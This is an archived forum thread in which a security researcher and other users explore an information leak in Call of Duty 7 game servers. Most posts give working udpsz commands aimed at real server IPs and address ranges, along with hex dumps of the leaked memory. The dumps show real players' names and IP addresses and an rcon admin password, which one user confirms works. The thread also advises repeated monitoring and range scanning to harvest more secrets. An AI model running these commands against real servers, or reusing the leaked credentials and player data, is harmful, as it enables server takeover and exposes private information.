Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 12:06

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 29 posts ] 
Author Message
 Post subject: something odd in cod7
PostPosted: 15 Nov 2010 11:56 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
I noticed this "problem" casually:

udpsz -C "ffffffff 00 0000000000000000" -D 173.199.78.230 3074 -1

where 173.199.78.230 is one of the various cod7 servers.
if you set the 8 bytes to something different than zero then you will see more memory (because the returned real message is shorter) but it could leave logs on the server.

do you notice something strange in the reply?

the server returns a packet of 1168 bytes where only the first 76 are the real reply and all the rest is part of the memory on the server.
for the moment I have seen nothing "interesting" in this returned memory but it's worth to point attention on it.

post your tests if you find something more interesting.


Top
 Profile  
 
 
 Post subject: Re: something odd in cod7
PostPosted: 15 Nov 2010 12:36 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
oh well, seems that something interesting exists :)
Code:
  00000000  ff ff ff ff 01 70 72 69 6e 74 0a 59 6f 75 20 6d   .....print.You m
  00000010  75 73 74 20 6c 6f 67 20 69 6e 20 77 69 74 68 20   ust log in with
  00000020  27 72 63 6f 6e 20 6c 6f 67 69 6e 20 3c 70 61 73   'rcon login <pas
  00000030  73 77 6f 72 64 3e 27 20 62 65 66 6f 72 65 20 75   sword>' before u
  00000040  73 69 6e 67 20 27 72 63 6f 6e 27 2e 0a 00 20 20   sing 'rcon'...
  00000050  20 20 20 20 31 20 20 20 20 20 20 20 30 20 38 38       1       0 88
  00000060  2e 38 38 2e 36 35 2e 32 32 3a 31 32 33 38 30 20   .88.65.22:12380
  00000070  20 20 20 20 20 32 37 33 31 37 20 32 35 30 30 30        27317 25000
  00000080  0a 20 31 32 20 20 20 35 31 30 20 20 20 38 38 20   . 12   510   88
  00000090  35 38 34 30 37 38 37 33 20 55 6e 6b 6e 6f 77 6e   58407873 Unknown
  000000a0  20 53 6f 6c 64 69 65 72 20 31 32 5e 37 20 20 20    Soldier 12^7
  000000b0  32 20 20 20 20 20 20 20 30 20 39 34 2e 31 31 2e   2       0 94.11.
  000000c0  32 34 33 2e 33 38 3a 35 32 34 20 20 20 20 20 20   243.38:524
  000000d0  20 31 34 30 37 35 20 32 35 30 30 30 0a 20 31 33    14075 25000. 13
  000000e0  20 20 20 37 37 30 20 20 31 30 34 20 33 30 31 36      770  104 3016
  000000f0  35 36 34 31 20 42 69 72 44 4d 61 4e 5e 37 20 20   5641 BirDMaN^7
  00000100  20 20 20 20 20 20 20 20 20 20 32 20 20 20 20 20             2
  00000110  20 20 30 20 39 30 2e 32 33 31 2e 31 38 31 2e 35     0 90.231.181.5
  00000120  39 3a 35 32 34 20 20 20 20 20 2d 31 33 36 38 38   9:524     -13688
  00000130  dc e0 18 00 8a 14 96 00 1b 00 00 00 00 00 00 00   ................
  00000140  d8 e0 18 00 aa 1d 96 00 10 e1 18 00 d8 3e ab 00   .............>..
  00000150  e0 16 47 07 1b e3 96 00 5c e3 18 00 fc ff ff ff   ..G.....\.......
  00000160  6c e3 18 00 40 2b 96 00 00 00 00 00 40 28 8c 05   l...@+......@(..
  00000170  40 28 8c 05 cc 2b 96 00 6e 00 00 00 2f 24 96 00   @(...+..n.../$..
  00000180  00 00 00 00 07 00 00 00 cc 2b 96 00 35 30 30 30   .........+..5000
  00000190  00 00 00 00 d8 3e ab 00 e0 16 47 07 d0 07 47 07   .....>....G...G.
  000001a0  01 39 36 38 90 e3 18 00 00 00 00 00 00 00 00 00   .968............
  000001b0  00 00 00 00 16 cb a2 00 00 00 00 00 00 00 00 00   ................
  000001c0  00 00 00 00 00 00 00 00 11 00 00 00 00 e4 18 00   ................
  000001d0  04 00 00 00 5c e3 18 00 fc ff ff ff 07 00 00 00   ....\...........
  000001e0  40 00 00 00 00 00 00 00 30 30 0a 20 00 00 00 00   @.......00. ....
  000001f0  32 31 36 00 00 00 00 00 32 20 36 39 33 33 39 39   216.....2 693399
  00000200  39 20 42 6c 76 69 74 61 20 46 6c 69 6e 67 6f 72   9 Blvita Flingor
  00000210  5e 37 20 20 20 20 20 31 20 20 20 20 20 20 20 30   ^7     1       0
  00000220  20 37 38 2e 38 32 2e 39 39 2e 31 30 36 3a 35 32    78.82.99.106:52
  00000230  34 20 20 20 20 20 20 20 33 30 35 31 32 20 32 35   4       30512 25
  00000240  30 30 30 0a 20 31 37 20 20 20 20 38 30 20 20 20   000. 17    80
  00000250  35 36 20 35 35 32 31 33 33 37 35 20 34 32 30 20   56 55213375 420
  00000260  56 61 72 65 6e 64 65 6c 6c 5e 37 20 20 20 20 20   Varendell^7
  00000270  20 32 20 20 20 20 20 20 20 30 20 38 32 2e 37 32    2       0 82.72
  00000280  2e 31 37 39 2e 32 30 3a 35 32 34 20 20 20 20 20   .179.20:524
  00000290  20 2d 33 32 30 31 34 20 32 35 30 30 30 0a 20 31    -32014 25000. 1
  000002a0  38 20 20 20 38 35 30 20 20 20 38 30 20 37 35 32   8   850   80 752
  000002b0  32 39 34 20 4d 75 74 61 6e 74 20 43 75 6d 66 61   294 Mutant Cumfa
  000002c0  63 65 5e 37 20 20 20 20 20 32 20 20 20 20 20 20   ce^7     2
  000002d0  20 30 20 38 33 2e 31 37 37 2e 37 32 2e 39 38 3a    0 83.177.72.98:
  000002e0  35 32 34 20 20 20 20 20 20 20 2d 33 32 31 34 20   524       -3214
  000002f0  32 35 30 30 30 0a 0a 00 30 20 36 32 35 33 35 32   25000...0 625352
  00000300  35 39 20 43 72 6f 73 73 46 69 72 65 5e 37 20 20   59 CrossFire^7
  00000310  20 20 20 20 20 20 20 20 31 20 20 20 20 20 20 20           1
  00000320  30 20 39 34 2e 30 2e 32 32 35 2e 38 36 3a 35 32   0 94.0.225.86:52
  00000330  34 20 20 20 20 20 20 20 2d 33 30 37 39 33 20 32   4       -30793 2
  00000340  35 30 30 30 0a 20 20 37 20 20 20 39 33 30 20 20   5000.  7   930
  00000350  20 36 33 20 37 32 35 37 37 33 35 37 20 4a 6f 63    63 72577357 Joc
  00000360  6b 6f 5e 37 20 20 20 20 20 20 20 20 20 20 20 20   ko^7
  00000370  20 20 32 20 20 20 20 20 20 20 30 20 39 30 2e 31     2       0 90.1
  00000380  39 32 2e 33 33 2e 31 3a 35 32 34 20 20 20 20 20   92.33.1:524
  00000390  20 20 2d 31 30 36 37 31 20 32 35 30 30 30 0a 20     -10671 25000.
  000003a0  20 38 20 20 31 30 33 30 20 20 20 36 35 20 33 33    8  1030   65 33
  000003b0  33 39 36 33 37 35 20 50 65 74 65 5e 37 20 20 20   396375 Pete^7
  000003c0  20 20 20 20 20 20 20 20 20 20 20 20 31 20 20 20               1
  000003d0  20 20 20 20 30 20 38 31 2e 31 35 31 2e 32 34 33       0 81.151.243
  000003e0  32 37 39 39 3a 33 38 33 39 20 20 20 69 83 84 4b   2799:3839   i..K
  000003f0  b0 e3 18 00 00 67 95 00 90 e3 18 00 08 cb a2 00   .....g..........
  00000400  00 00 00 00 ec e3 18 00 40 28 8c 05 40 00 00 00   ........@(..@...
  00000410  e2 25 a0 00 51 28 8c 05 2e 00 00 00 40 28 8c 05   .%..Q(......@(..
  00000420  42 00 00 00 e2 25 a0 00 47 28 8c 05 38 00 00 00   B....%..G(..8...
  00000430  40 28 8c 05 cc e3 18 00 40 67 95 00 40 28 8c 05   @(......@g..@(..
  00000440  40 00 00 00 08 cb a2 00 00 00 00 00 ec e3 18 00   @...............
  00000450  00 00 00 00 81 f4 69 00 40 28 8c 05 40 00 00 00   ......i.@(..@...
  00000460  08 cb a2 00 ec e3 18 00 46 50 5f 00 08 cb a2 00   ........FP_.....
  00000470  5d 00 00 00 24 00 00 00 dc 00 00 00 2f 00 00 00   ]...$......./...
  00000480  ef 0a 00 00 01 00 00 00 05 60 9c 4b fa 53 5e 00   .........`.K.S^.
the next version of udpsz will have a range host scanner making this job (sending packets to multiple hosts) really very easy


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 15 Nov 2010 15:46 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
what are those names and IPs ? they're not real player names and IP, or are they ?
is that what you meant under insteresting ? that it actually sends you a reply, showing IPs and players connected to the server ?


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 15 Nov 2010 16:30 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
they are exactly the names and IPs of the players on that server and in my opinion it's an interesting information mainly for 2 reasons:
  • anyone except the admin can't and shouldn't see the IP addresses of the other players
  • I got that packet in a test made in 2 seconds, so if I can retrieve a similar info casually in a so short amount of time there is room for even more interesting informations having more patience
anyway note that this is a small portion of the memory of the server so you don't know and can't guess what data it will return and how important or in real-time it can be.

the application of this vulnerability could be with a continuous "pinging" of the server and the verification of the data replied to see if there is something "interesting", so by adding the -l 1000 option to the previously showed udpsz command.


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 17 Nov 2010 02:02 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
how or why did you came up with something like that ? i would have never even tried to change some bytes. why did you think it might have effect ?

by interesting, you mean ... oh lets see..like password/s ? or cd-keys ?
i dont like cod series, cod is lame and childish, so im not going to test any of that myself :)


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 17 Nov 2010 17:22 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
I arrived on it because I wanted to know what opcodes are supported by the server so I launched udpsz with the -X 4 8 l 0 option for scanning all the possible 256 values of the byte at offset 4.

it's a server so it shouldn't contain the users cdkeys but I can't exclude the possibility of viewing a password or parts of it or replies to commands sent by the administrator and so on.
it's memory so I can't guess the type of data it will display and its integrity


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 17 Nov 2010 23:43 

Joined: 09 Mar 2010 23:13
Posts: 40
Nice find Luigi ! But how I can get useful info like on your screen ? Because I'm every time got only first 80 bytes readable (...print. You must log....). Surely, I'm send packets to different servers


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 18 Nov 2010 10:11 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
I saw that screen when I was sending the packet to a small range of these servers (for example x.x.x.10-20) and I casually noticed it.
this particular feature of udpsz will be available in the next version.

so you should choose a server to monitor and add the -l 1000 option to send the packet to it and checking if sometimes it returns something good.

an important note:
I don't know if these packets get logged.
I'm almost sure that those with a wrong password are logged/visible because it's just what happens with the other games based on the q3 engine


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 18 Nov 2010 10:24 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
is the following something interesting?
Code:
  00000050  73 65 63 6b 65 79 20 36 61 62 33 61 35 32 36 20   seckey 6ab3a526
  00000060  33 38 66 63 32 63 30 33 20 30 33 61 30 35 30 64   38fc2c03 03a050d
  00000070  11 00 00 00 01 00 00 00 f0 e0 18 00 51 6f 73 20   ............Qos
  00000080  6c 69 73 74 65 6e 65 72 20 73 74 61 72 74 65 64   listener started
  00000090  0d 0a 43 6d 64 5f 41 64 64 43 6f 6d 6d 61 6e 64   ..Cmd_AddCommand


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 18 Nov 2010 11:14 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
I confirm that there is also a possibility of viewing the cvars on the servers, for example if the admin launched cvarlist before.

so, although very rare, there is a possibility that the rcon password gets displaying through this vulnerability.

I will release a new version of udpsz and a plugin to filter the informations (showed as strings) later.


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 18 Nov 2010 11:22 

Joined: 09 Mar 2010 23:13
Posts: 40
Thx Luigi. We are waiting =)

When approximate new version will be released ?


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 18 Nov 2010 22:30 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
hmm, is there any way to call certain memory location or is it completely random, what it returns ?
if such thing exists, there might be a way to write into memory too, by like sending a packet that contains more data that it should and by doing that, it overwrites something, where it shouldnt.


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 18 Nov 2010 22:39 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
I have released the advisory with all the needed links and examples inside it:
http://aluigi.org/adv/cod7mem-adv.txt


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 19 Nov 2010 17:59 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
ops, seems that catching the rcon password is not a "very rare event" :)
Code:
- 173.199.77.3 : 3074
.
  00000000  ff ff ff ff 01 70 72 69 6e 74 0a 59 6f 75 20 6d   .....print.You m
  00000010  75 73 74 20 6c 6f 67 20 69 6e 20 77 69 74 68 20   ust log in with
  00000020  27 72 63 6f 6e 20 6c 6f 67 69 6e 20 3c 70 61 73   'rcon login <pas
  00000030  73 77 6f 72 64 3e 27 20 62 65 66 6f 72 65 20 75   sword>' before u
  00000040  73 69 6e 67 20 27 72 63 6f 6e 27 2e 0a 00 73 67   sing 'rcon'...sg
  00000050  20 61 64 64 72 65 73 73 20 20 20 20 20 20 20 20    address       
  00000060  20 20 20 20 20 20 20 71 70 6f 72 74 20 20 72 61          qport  ra
  00000070  74 65 0a 2d 2d 2d 20 2d 2d 2d 2d 2d 20 2d 2d 2d   te.--- ----- ---
  00000080  2d 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 2d 2d 2d   - ---------- ---
  00000090  2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 2d 2d 2d   ------------ ---
  000000a0  2d 20 2d 2d 2d 2d 2d 2d 2d 20 2d 2d 2d 2d 2d 2d   - ------- ------
  000000b0  2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20   ---------------
  000000c0  2d 2d 2d 2d 2d 2d 20 2d 2d 2d 2d 2d 0a 0a 00 20   ------ -----...
  000000d0  6d 70 5f 72 61 64 69 61 74 69 6f 6e 20 6d 61 70   mp_radiation map
  000000e0  20 6d 70 5f 72 75 73 73 69 61 6e 62 61 73 65 20    mp_russianbase
  000000f0  6d 61 70 20 6d 70 5f 76 69 6c 6c 61 5e 37 22 20   map mp_villa^7"
  00000100  64 65 66 61 75 6c 74 3a 20 22 5e 37 22 0a 20 20   default: "^7". 
  00000110  44 6f 6d 61 69 6e 20 69 73 20 61 6e 79 20 74 65   Domain is any te
  00000120  78 74 0a 00 20 20 20 20 20 73 76 5f 70 72 69 76   xt..     sv_priv
  00000130  dc e0 18 00 4a 14 96 00 1b 00 00 00 00 00 00 00   ....J...........
  00000140  d8 e0 18 00 6a 1d 96 00 10 e1 18 00 d8 3e ab 00   ....j........>..
  00000150  e0 16 59 07 e4 e2 96 00 5c e3 18 00 fc ff ff ff   ..Y.....\.......
  00000160  6c e3 18 00 a7 2a 96 00 00 00 00 00 40 28 8c 05   l....*......@(..
  00000170  40 28 8c 05 33 2b 96 00 6e 00 00 00 96 23 96 00   @(..3+..n....#..
  00000180  00 00 00 00 07 00 00 00 33 2b 96 00 20 73 76 5f   ........3+.. sv_
  00000190  00 00 00 00 d8 3e ab 00 e0 16 59 07 d0 07 59 07   .....>....Y...Y.
  000001a0  01 20 41 20 90 e3 18 00 00 00 00 00 00 00 00 00   . A ............
  000001b0  00 00 00 00 1e cb a2 00 00 00 00 00 00 00 00 00   ................
  000001c0  00 00 00 00 00 00 00 00 11 00 00 00 00 e4 18 00   ................
  000001d0  04 00 00 00 5c e3 18 00 fc ff ff ff 07 00 00 00   ....\...........
  000001e0  40 00 00 00 00 00 00 00 20 73 76 5f 00 00 00 00   @....... sv_....
  000001f0  69 65 74 00 00 00 00 00 32 22 0a 20 20 20 20 41   iet.....2".    A
  00000200  20 20 20 20 20 20 20 20 20 76 6f 69 63 65 5f 64            voice_d
  00000210  65 61 64 43 68 61 74 20 22 30 22 0a 20 20 20 20   eadChat "0".   
  00000220  41 20 20 20 20 20 20 20 20 20 76 6f 69 63 65 5f   A         voice_
  00000230  67 6c 6f 62 61 6c 20 22 30 22 0a 0a 34 34 20 74   global "0"..44 t
  00000240  6f 74 61 6c 20 64 76 61 72 73 0a 00 31 22 0a 20   otal dvars..1".
  00000250  20 20 20 41 20 20 20 20 20 20 20 20 20 70 6c 61      A         pla
  00000260  79 6c 69 73 74 5f 65 78 63 6c 75 64 65 47 61 6d   ylist_excludeGam
  00000270  65 74 79 70 65 20 22 22 0a 20 20 20 20 41 20 20   etype "".    A 
  00000280  20 20 20 20 20 20 20 70 6c 61 79 6c 69 73 74 5f          playlist_
  00000290  65 78 63 6c 75 64 65 47 61 6d 65 74 79 70 65 4d   excludeGametypeM
  000002a0  61 70 20 22 22 0a 20 20 20 20 41 20 20 20 20 20   ap "".    A     
  000002b0  20 20 20 20 70 6c 61 79 6c 69 73 74 5f 65 78 63       playlist_exc
  000002c0  6c 75 64 65 4d 61 70 20 22 22 0a 20 20 20 20 20   ludeMap "".     
  000002d0  20 20 20 20 20 20 20 20 20 72 63 6f 6e 5f 70 61            rcon_pa
  000002e0  73 73 77 6f 72 64 20 22 6d 61 6e 61 67 65 72 22   ssword "manager"
  000002f0  0a 53 20 20 20 20 20 20 20 20 20 20 45 20 20 73   .S          E  s
  00000300  63 72 5f 6d 6f 74 64 20 22 4d 65 73 73 61 67 65   cr_motd "Message
  00000310  20 6f 66 20 74 68 65 20 44 61 79 22 0a 20 20 20    of the Day".   
  00000320  20 20 20 20 20 20 20 20 20 20 20 73 76 5f 63 6f              sv_co
  00000330  6e 6e 65 63 74 54 69 6d 65 6f 75 74 20 22 38 30   nnectTimeout "80
  00000340  22 0a 53 20 20 20 41 20 20 20 20 20 20 20 20 20   ".S   A         
  00000350  73 76 5f 66 6c 6f 6f 64 70 72 6f 74 65 63 74 20   sv_floodprotect
  00000360  22 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20   "4".           
  00000370  20 20 73 76 5f 66 70 73 20 22 32 30 22 0a 53 20     sv_fps "20".S
  00000380  20 20 41 20 20 20 20 20 20 20 20 20 73 76 5f 68     A         sv_h
  00000390  6f 73 74 6e 61 6d 65 20 22 5e 30 46 42 49 20 5e   ostname "^0FBI ^
  000003a0  31 47 61 6d 69 6e 67 20 5e 32 53 26 44 20 5e 33   1Gaming ^2S&D ^3
  000003b0  5b 52 61 6e 6b 65 64 5d 22 0a 20 20 20 20 20 20   [Ranked]".     
  000003c0  20 20 20 20 20 20 20 20 73 76 5f 6b 69 63 6b 42           sv_kickB
  000003d0  61 6e 54 69 6d 65 20 22 33 30 30 22 0a 20 20 35   anTime "300".  5
  000003e0  32 37 37 33 20 20 20 20 20 20 20 73 f6 8c 88 53   2773       s...S
  000003f0  b0 e3 18 00 c0 66 95 00 90 e3 18 00 10 cb a2 00   .....f..........
  00000400  00 00 00 00 ec e3 18 00 40 28 8c 05 40 00 00 00   ........@(..@...
  00000410  e2 25 a0 00 51 28 8c 05 2e 00 00 00 40 28 8c 05   .%..Q(......@(..
  00000420  42 00 00 00 e2 25 a0 00 47 28 8c 05 38 00 00 00   B....%..G(..8...
  00000430  40 28 8c 05 cc e3 18 00 00 67 95 00 40 28 8c 05   @(.......g..@(..
  00000440  40 00 00 00 10 cb a2 00 00 00 00 00 ec e3 18 00   @...............
  00000450  00 00 00 00 71 f2 69 00 40 28 8c 05 40 00 00 00   ....q.i.@(..@...
  00000460  10 cb a2 00 ec e3 18 00 a6 4e 5f 00 10 cb a2 00   .........N_.....
  00000470  5d 00 00 00 24 00 00 00 d9 00 00 00 41 00 00 00   ]...$.......A...
  00000480  d5 0a 00 00 01 00 00 00 9a 6f 90 53 8a 52 5e 00   .........o.S.R^.
and
Code:
- 173.199.77.18 : 3074
.
  00000000  ff ff ff ff 01 70 72 69 6e 74 0a 59 6f 75 20 6d   .....print.You m
  00000010  75 73 74 20 6c 6f 67 20 69 6e 20 77 69 74 68 20   ust log in with
  00000020  27 72 63 6f 6e 20 6c 6f 67 69 6e 20 3c 70 61 73   'rcon login <pas
  00000030  73 77 6f 72 64 3e 27 20 62 65 66 6f 72 65 20 75   sword>' before u
  00000040  73 69 6e 67 20 27 72 63 6f 6e 27 2e 0a 00 70 5f   sing 'rcon'...p_
  00000050  63 6f 73 6d 6f 64 72 6f 6d 65 20 6d 61 70 20 6d   cosmodrome map m
  00000060  70 5f 63 72 61 63 6b 65 64 20 6d 61 70 20 6d 70   p_cracked map mp
  00000070  5f 63 72 69 73 69 73 20 6d 61 70 20 6d 70 5f 64   _crisis map mp_d
  00000080  75 67 61 20 6d 61 70 20 6d 70 5f 66 69 72 69 6e   uga map mp_firin
  00000090  67 72 61 6e 67 65 20 6d 61 70 20 6d 70 5f 68 61   grange map mp_ha
  000000a0  6e 6f 69 20 6d 61 70 20 6d 70 5f 68 61 76 6f 63   noi map mp_havoc
  000000b0  20 6d 61 70 20 6d 70 5f 6d 6f 75 6e 74 61 69 6e    map mp_mountain
  000000c0  20 6d 61 70 20 6d 70 5f 6e 75 6b 65 64 20 6d 61    map mp_nuked ma
  000000d0  70 20 6d 70 5f 72 61 64 69 61 74 69 6f 6e 20 6d   p mp_radiation m
  000000e0  61 70 20 6d 70 5f 72 75 73 73 69 61 6e 62 61 73   ap mp_russianbas
  000000f0  65 20 6d 61 70 20 6d 70 5f 76 69 6c 6c 61 5e 37   e map mp_villa^7
  00000100  22 20 64 65 66 61 75 6c 74 3a 20 22 5e 37 22 0a   " default: "^7".
  00000110  20 20 44 6f 6d 61 69 6e 20 69 73 20 61 6e 79 20     Domain is any
  00000120  74 65 78 74 0a 00 20 20 20 20 20 20 73 76 5f 70   text..      sv_p
  00000130  dc e0 18 00 4a 14 96 00 1b 00 00 00 00 00 00 00   ....J...........
  00000140  d8 e0 18 00 6a 1d 96 00 10 e1 18 00 d8 3e ab 00   ....j........>..
  00000150  e0 16 39 07 e4 e2 96 00 5c e3 18 00 fc ff ff ff   ..9.....\.......
  00000160  6c e3 18 00 a7 2a 96 00 00 00 00 00 40 28 8c 05   l....*......@(..
  00000170  40 28 8c 05 33 2b 96 00 6e 00 00 00 96 23 96 00   @(..3+..n....#..
  00000180  00 00 00 00 07 00 00 00 33 2b 96 00 20 20 20 20   ........3+..   
  00000190  00 00 00 00 d8 3e ab 00 e0 16 39 07 d0 07 39 07   .....>....9...9.
  000001a0  01 53 20 20 90 e3 18 00 00 00 00 00 00 00 00 00   .S  ............
  000001b0  00 00 00 00 1e cb a2 00 00 00 00 00 00 00 00 00   ................
  000001c0  00 00 00 00 00 00 00 00 11 00 00 00 00 e4 18 00   ................
  000001d0  04 00 00 00 5c e3 18 00 fc ff ff ff 07 00 00 00   ....\...........
  000001e0  40 00 00 00 00 00 00 00 20 20 20 20 00 00 00 00   @.......    ....
  000001f0  6f 6d 62 00 00 00 00 00 65 20 22 32 22 0a 20 20   omb.....e "2". 
  00000200  20 20 41 20 20 20 20 20 20 20 20 20 76 6f 69 63     A         voic
  00000210  65 5f 64 65 61 64 43 68 61 74 20 22 30 22 0a 20   e_deadChat "0".
  00000220  20 20 20 41 20 20 20 20 20 20 20 20 20 76 6f 69      A         voi
  00000230  63 65 5f 67 6c 6f 62 61 6c 20 22 30 22 0a 0a 34   ce_global "0"..4
  00000240  34 20 74 6f 74 61 6c 20 64 76 61 72 73 0a 00 22   4 total dvars.."
  00000250  0a 20 20 20 20 41 20 20 20 20 20 20 20 20 20 70   .    A         p
  00000260  6c 61 79 6c 69 73 74 5f 65 78 63 6c 75 64 65 47   laylist_excludeG
  00000270  61 6d 65 74 79 70 65 20 22 22 0a 20 20 20 20 41   ametype "".    A
  00000280  20 20 20 20 20 20 20 20 20 70 6c 61 79 6c 69 73            playlis
  00000290  74 5f 65 78 63 6c 75 64 65 47 61 6d 65 74 79 70   t_excludeGametyp
  000002a0  65 4d 61 70 20 22 22 0a 20 20 20 20 41 20 20 20   eMap "".    A   
  000002b0  20 20 20 20 20 20 70 6c 61 79 6c 69 73 74 5f 65         playlist_e
  000002c0  78 63 6c 75 64 65 4d 61 70 20 22 22 0a 20 20 20   xcludeMap "".   
  000002d0  20 20 20 20 20 20 20 20 20 20 20 72 63 6f 6e 5f              rcon_
  000002e0  70 61 73 73 77 6f 72 64 20 22 6d 61 6e 61 67 65   password "manage
  000002f0  72 22 0a 53 20 20 20 20 20 20 20 20 20 20 45 20   r".S          E
  00000300  20 73 63 72 5f 6d 6f 74 64 20 22 4d 65 73 73 61    scr_motd "Messa
  00000310  67 65 20 6f 66 20 74 68 65 20 44 61 79 22 0a 20   ge of the Day".
  00000320  20 20 20 20 20 20 20 20 20 20 20 20 20 73 76 5f                sv_
  00000330  63 6f 6e 6e 65 63 74 54 69 6d 65 6f 75 74 20 22   connectTimeout "
  00000340  38 30 22 0a 53 20 20 20 41 20 20 20 20 20 20 20   80".S   A       
  00000350  20 20 73 76 5f 66 6c 6f 6f 64 70 72 6f 74 65 63     sv_floodprotec
  00000360  74 20 22 34 22 0a 20 20 20 20 20 20 20 20 20 20   t "4".         
  00000370  20 20 20 20 73 76 5f 66 70 73 20 22 32 30 22 0a       sv_fps "20".
  00000380  53 20 20 20 41 20 20 20 20 20 20 20 20 20 73 76   S   A         sv
  00000390  5f 68 6f 73 74 6e 61 6d 65 20 22 5e 30 46 42 49   _hostname "^0FBI
  000003a0  20 5e 31 47 61 6d 69 6e 67 20 5e 32 48 51 20 5e    ^1Gaming ^2HQ ^
  000003b0  33 5b 52 61 6e 6b 65 64 5d 22 0a 20 20 20 20 20   3[Ranked]".     
  000003c0  20 20 20 20 20 20 20 20 20 73 76 5f 6b 69 63 6b            sv_kick
  000003d0  42 61 6e 54 69 6d 65 20 22 33 30 30 22 0a 20 35   BanTime "300". 5
  000003e0  32 37 37 33 20 20 20 20 20 20 20 20 39 21 65 3c   2773        9!e<
  000003f0  b0 e3 18 00 c0 66 95 00 90 e3 18 00 10 cb a2 00   .....f..........
  00000400  00 00 00 00 ec e3 18 00 40 28 8c 05 40 00 00 00   ........@(..@...
  00000410  e2 25 a0 00 51 28 8c 05 2e 00 00 00 40 28 8c 05   .%..Q(......@(..
  00000420  42 00 00 00 e2 25 a0 00 47 28 8c 05 38 00 00 00   B....%..G(..8...
  00000430  40 28 8c 05 cc e3 18 00 00 67 95 00 40 28 8c 05   @(.......g..@(..
  00000440  40 00 00 00 10 cb a2 00 00 00 00 00 ec e3 18 00   @...............
  00000450  00 00 00 00 71 f2 69 00 40 28 8c 05 40 00 00 00   ....q.i.@(..@...
  00000460  10 cb a2 00 ec e3 18 00 a6 4e 5f 00 10 cb a2 00   .........N_.....
  00000470  5d 00 00 00 24 00 00 00 d9 00 00 00 41 00 00 00   ]...$.......A...
  00000480  d5 0a 00 00 01 00 00 00 55 c2 7d 3c 8a 52 5e 00   ........U.}<.R^.
it's incredible to notice that I got these info at the first hit without sending tons of packets... just the first session!

udpsz -C "ffffffff 00 0000000000000000" -D 173.199.77.1-240 3074 -1

note that I have not verified if that rcon password is correct but it looks strange (or stupid) to have an rcon password set to "manager" on any server.

P.S.: sorry for the hexdump output, I forgot to use the cod7mem plugin


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 20 Nov 2010 00:01 

Joined: 03 Dec 2008 18:35
Posts: 8
the rcon passwords works


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 20 Nov 2010 17:14 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
so there is a way to "request" certain info after all ? like certain place of memory dump ?
Luigi, using "manager" as password is very common. 99% of admins use very simple passwords, like 123456, password, superman, spiderman ..etc. nothing surprising to me.


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 21 Nov 2010 10:24 

Joined: 09 Mar 2010 23:13
Posts: 40
I'm tryed to send a packet today - it's not working with .dll. Without it I'm got dump like in my previous post. With .dll I'm used a command:

Code:
udpsz -q -l 1000 -C "ffffffff 00 0000000000000000" -D -L cod7mem.dll 195.122.135.93 3074 -1


and udpsz return to me :

Code:
- target   195.122.135.93 : 3074

DUMP:
^ 0 000 GameServers.co
wMultiplayer - Sh


and that's all. But the process sending packets is not stoped. It's continues every time with this text


Top
 Profile  
 
 Post subject: Re: something odd in cod7
PostPosted: 21 Nov 2010 10:59 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
the dll acts as a filter for removing the garbage data.
are you sure that in the packet you received there was also better data?

if with the dll has been displayed only that line means that only that data was available in the received packet.
indeed if the packet sent back from the server was the second one I posted above you must view the following:
Code:
DUMP:
p_cosmodrome map mp_cracked map mp_crisis map mp_duga map mp_firingrange map mp_hanoi map mp_havoc map mp_mountain map mp_nuked map mp_radiation map mp_russianbase map mp_villa^7" default: "^7"
Domain is any text
sv_p
A         voice_deadChat "0"
A         voice_global "0"
44 total dvars
A         playlist_excludeGametype ""
A         playlist_excludeGametypeMap ""
A         playlist_excludeMap ""
rcon_password "manager"
S          E  scr_motd "Message of the Day"
sv_connectTimeout "80"
S   A         sv_floodprotect "4"
sv_fps "20"
S   A         sv_hostname "^0FBI ^1Gaming ^2HQ ^3[Ranked]"
sv_kickBanTime "300"
52773        9!e<
and if it doesn't update or display new stuff it's all perfectly correct because the dll automatically caches the latest data displayed so that if the server send another packet with the same info it doesn't redisplay it... that's why it's called "monitoring" job :)

obviously you can't hope to see the "good" informations at the first hit, otherwise I didn't mention about monitoring if it wasn't needed.

so if you want to test the bug but you have not patience (like me) scan a range of hosts, for example the following does the B class from 70 to 79 or 172.193.x.x:

